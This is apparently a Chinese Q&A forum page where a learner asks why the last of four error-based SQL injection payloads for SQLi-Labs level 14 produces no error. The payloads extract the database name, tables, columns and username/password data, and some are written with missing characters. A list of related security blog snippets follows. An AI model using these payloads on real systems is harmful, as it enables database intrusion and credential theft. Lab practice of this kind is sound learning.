使用使用下面三个语句都能够获得信息
(1)获取数据库名1" union select count(*),concat((select database()),floor(rand(0)2)) as a from information_schema.tables group by a #
(2)获取数据库的表名1" union select count(),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)2)) as a from information_schema.tables group by a #
(3)获取表中的字段名1" union select count(),concat((select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand(0)2)) as a from information_schema.tables group by a #
可是为什么下面这个语句却无法获得信息
获取字段username和password中的数据:
1" union select count(),concat((select group_concat(concat(username,password)) from users),floor(rand(0)*2)) as a from information_schema.tables group by a #
输入这个语句后不会报错,我看这个语句和上面三个相差不大,按道理不是应该也报错吗?但它就是不会报错。
求有经验的解答一下
关于SQL—labs靶场第14关的一个疑问
- 写回答
- 好问题 0 提建议
- 关注问题
分享- 邀请回答
-
1条回答 默认 最新
Watch the clown 2023-05-21 16:32关注你确定username和password记录都存在吗?我觉得他本来就不应该报错语法没看出来有什么错误,最多一直转圈
本回答被专家选为最佳回答 , 对您是否有帮助呢?评论 打赏解决 1无用举报 分享
- 2022-07-10 21:43黑色地带(崛起)的博客 【SQL】sqlmap+手工
- 2025-12-22 11:02爱吃小石榴16的博客 比如在 SQLi-Labs 练会 19 种注入方法,再去挖企业网站的 SQL 注入漏洞,一挖一个准,不用再靠运气碰漏洞; 系统漏洞靶场:Vulfocus,一键启动 Log4j2、Struts2 等高危漏洞环境,练漏洞利用。比如先在靶场复现 Log4j...
- 2024-07-02 10:20承悦不会玩的博客 SQL 注入(SQL Injection)是一种常见的网络攻击技术,攻击者通过在应用程序的输入字段中插入恶意的 SQL 代码,从而改变原本的 SQL 查询语句的逻辑,以达到非法访问、修改或删除数据库中数据的目的。
- 2024-11-01 16:30鱼馬的博客 Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据...
- 2025-04-16 14:37鱼馬的博客 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的...
- 2024-12-02 16:39码农x马马的博客 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的...
- 2020-02-21 15:47Eastmount的博客 这是作者的网络安全自学教程系列,主要是关于安全工具和...本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
- 2020-04-29 16:43Eastmount的博客 这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、...
- 2021-10-26 15:54Eastmount的博客 这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了...
- 2024-10-14 14:54网络安全教程库的博客 为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶...
- 2025-12-04 15:58编程瞬息全宇宙的博客 本文从技术、政策和就业三个维度解析网络空间安全:技术上,它不仅是"防黑客",更是保护数据机密性、完整性和可用性的综合体系,涵盖渗透测试、漏洞挖掘等多领域;政策上,国家通过法律法规、产业扶持和...
- 2020-07-16 12:03Eastmount的博客 这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将...
- 2024-10-28 15:52网络安全教程库的博客 为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶...
- 2024-12-11 10:06网络安全大白的博客 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的...
- 2021-08-22 16:15信息安全方案的博客 1993 年,《纽约客》(The New Yorker)杂志刊登一则由彼得·施泰纳(Peter Steiner)创作的漫画:标题是【On the Internet, nobody knows you’re a dog.】 这则漫画中有两只狗:一只黑狗站在电脑椅上,爪子扶着...
- 没有解决我的问题, 去提问
问题事件
系统已结题
6月8日
专家已采纳回答
5月31日
创建了问题
5月21日